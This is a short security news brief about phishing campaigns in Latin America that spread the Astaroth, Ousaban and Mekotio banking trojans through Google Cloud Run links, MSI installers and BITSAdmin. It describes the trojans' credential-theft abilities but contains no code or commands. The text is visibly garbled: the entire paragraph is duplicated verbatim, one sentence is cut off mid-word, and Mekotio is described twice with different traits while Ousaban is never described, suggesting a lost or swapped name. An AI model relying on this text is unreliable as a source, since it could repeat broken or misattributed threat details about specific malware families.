BleepingComputer reports that several countries across Latin America have been subjected to high-volume attacks deploying the Astaroth, Ousaban, and Mekotio banking trojans that involved the exploitation of the Google Cloud Run service since September.
Intrusions commenced with the distribution of phishing emails using financial and tax documents, as well as local government communications, as lures, which contain links to Google Cloud Run, a report from Cisco Talos showed. Attackers then use MSI files to facilitate initial payload delivery, with the BITSAdmin Windows tool later exploited to enable second-stage payload distribution. Further examination of the delivered trojans noted that more than 300 financial organizations have already been targeted by the Astaroth trojan, also known as Guildma. Aside from enabling keylogging and clipboard monitoring, Astaroth also allows the exfiltration of cryptocurrency wallet and banking credentials. On the other hand, Mekotio, which was noted to be delivered in the latter part of Astaroth attacks, allows credential phishing via fraudulent banking p Meanwhile, Mekotio permits browser manipulation in addition to banking credential and personal data theft.
Intrusions commenced with the distribution of phishing emails using financial and tax documents, as well as local government communications, as lures, which contain links to Google Cloud Run, a report from Cisco Talos showed. Attackers then use MSI files to facilitate initial payload delivery, with the BITSAdmin Windows tool later exploited to enable second-stage payload distribution. Further examination of the delivered trojans noted that more than 300 financial organizations have already been targeted by the Astaroth trojan, also known as Guildma. Aside from enabling keylogging and clipboard monitoring, Astaroth also allows the exfiltration of cryptocurrency wallet and banking credentials. On the other hand, Mekotio, which was noted to be delivered in the latter part of Astaroth attacks, allows credential phishing via fraudulent banking p Meanwhile, Mekotio permits browser manipulation in addition to banking credential and personal data theft.
